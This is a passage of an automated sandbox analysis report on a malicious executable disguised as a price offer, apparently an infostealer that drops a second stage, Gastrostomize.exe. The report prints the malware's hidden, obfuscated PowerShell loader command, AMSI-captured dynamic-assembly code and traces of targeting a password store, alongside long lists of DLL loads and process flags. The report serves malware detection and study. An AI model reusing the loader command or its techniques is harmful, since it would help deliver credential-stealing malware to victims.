Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Gastrostomize.exe, 00000004.00000002.2099444975.000000001F0D9000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EF9F000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F0C1000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EFC5000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001EFB6000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F056000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F048000.00000004.00000800.00020000.00000000.sdmp, Gastrostomize.exe, 00000004.00000002.2099444975.000000001F030000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Price Offer_1200R4 1200R20.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File read: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe "C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe"
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe "C:\Users\user\AppData\Local\Temp\Gastrostomize.exe"
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe "C:\Users\user\AppData\Local\Temp\Gastrostomize.exe" Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Price Offer_1200R4 1200R20.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Source: Yara match File source: 00000004.00000002.2082764498.0000000001822000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Discursion $obligatorisk $Bankaktiers), (Calfkill @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Ufredelighed = [AppDomain]::CurrentDomain.GetAssemblies()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Tvundnes)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dyreryggen, $false).DefineType($Freskoens, $Vers
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)"
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Facils=Get-Content 'C:\Users\user\AppData\Local\Temp\betalingsdatoer\oromo\tututni\Kaalhovedernes.Und33';$Cowpox=$Facils.SubString(36576,3);.$Cowpox($Facils)" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E0F59 push ebx; iretd 4_2_016E0F61
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E47E2 push edi; iretd 4_2_016E47E9
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E1BCE pushfd ; retf 4_2_016E1BCF
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E2BD5 push 5B2BAAD0h; retf 4_2_016E2BF1
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E086C push ebp; retf 4_2_016E0874
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E287A pushfd ; ret 4_2_016E2893
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E2620 push ss; retf 4_2_016E2658
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E3616 push edi; retf 4_2_016E3617
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E0CF7 push edx; iretd 4_2_016E0CFA
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_016E02C8 push edi; ret 4_2_016E02D3
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB4380 push eax; retf 4_2_20CB4381
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CBD5A2 push eax; ret 4_2_20CBD5B1
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB5D85 pushad ; retf 4_2_20CB5DA0
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB5EFF push ebp; retf 4_2_20CB5F08
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_20CB5E56 pushad ; retf 4_2_20CB5E68
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21DD1E10 push esp; ret 4_2_21DD1F11
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E2AE68 push edi; iretd 4_2_21E2AE9B
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E3ABD8 pushfd ; retf 21E1h 4_2_21E3ABE5
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E302CC push es; iretd 4_2_21E302F6
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E32FB0 push cs; ret 4_2_21E33024
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E62708 push 8B1FAE16h; retf 4_2_21E6270D
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E6A9E8 pushad ; retf 4_2_21E6A9B2
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E68DCA pushad ; ret 4_2_21E68DD5
Source: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Code function: 4_2_21E9542F push eax; ret 4_2_21E95443
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File created: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\AdvSplash.dll Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\Gastrostomize.exe Jump to dropped file
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe File created: C:\Users\user\AppData\Local\Temp\nst4C1E.tmp\nsDialogs.dll Jump to dropped file
Source: C:\Users\user\Desktop\Price Offer_1200R4 1200R20.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
